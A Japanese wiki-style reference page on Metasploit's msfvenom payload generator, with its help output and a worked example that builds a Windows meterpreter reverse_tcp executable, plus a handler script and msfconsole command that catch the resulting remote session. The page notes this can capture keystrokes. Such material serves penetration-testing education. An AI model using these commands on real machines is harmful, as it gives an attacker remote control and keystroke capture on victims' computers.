msfvenom
提供: セキュリティ
スポンサーリンク
Metasploitのmsfvenom とは、msfpayloadとmsfencodeを組み合わせたもので、1つのフレームワークにまとめられました。msfvenomは、msfpayloadとmsfencodeを置き換えるものです。
読み方
- msfvenom
- えむえすえふ べのむ (?)
概要
msfvenomは、ペイロードジェネレーターです。Windows などで動作するマルウェアの様なプログラムを作成できます。
使い方
コマンドらいのプション
root@kali:~# msfvenom -h Error: MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Options: -p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -f, --format <format> Output format (use --help-formats for a list) --help-formats List available formats -e, --encoder <encoder> The encoder to use -a, --arch <arch> The architecture to use --platform <platform> The platform of the payload --help-platforms List available platforms -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -b, --bad-chars <list> The list of characters to avoid example: '\x00\xff' -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -o, --out <path> Save the payload -v, --var-name <name> Specify a custom variable name to use for certain output formats --smallest Generate the smallest possible payload -h, --help Show this message
Windowsバイナリの作り方 reverse_tcpの例
Windows 用の実行ファイルを作成し、Windows で実行ファイルを実行したときに、 Metasploit 側の待受ポートに接続させ、キーの入力などを取得することができます。
reverse_tcp を利用した、 Windows 用 の実行ファイルの作り方は以下の通りです。
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \ LHOST=192.168.1.101 -b "\x00" -f exe -o Meterpreter.exe
Metasploit 側で実行するコマンドは以下の通りです。meterpreter.rc として記述します。
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.101 set LPORT 3333 set ExitOnSession false exploit -j -z
Metasploit の msfconsole コマンドで meterpreter.rc を実行します。
msfconsole -r meterpreter.rc
関連項目
ツイート
スポンサーリンク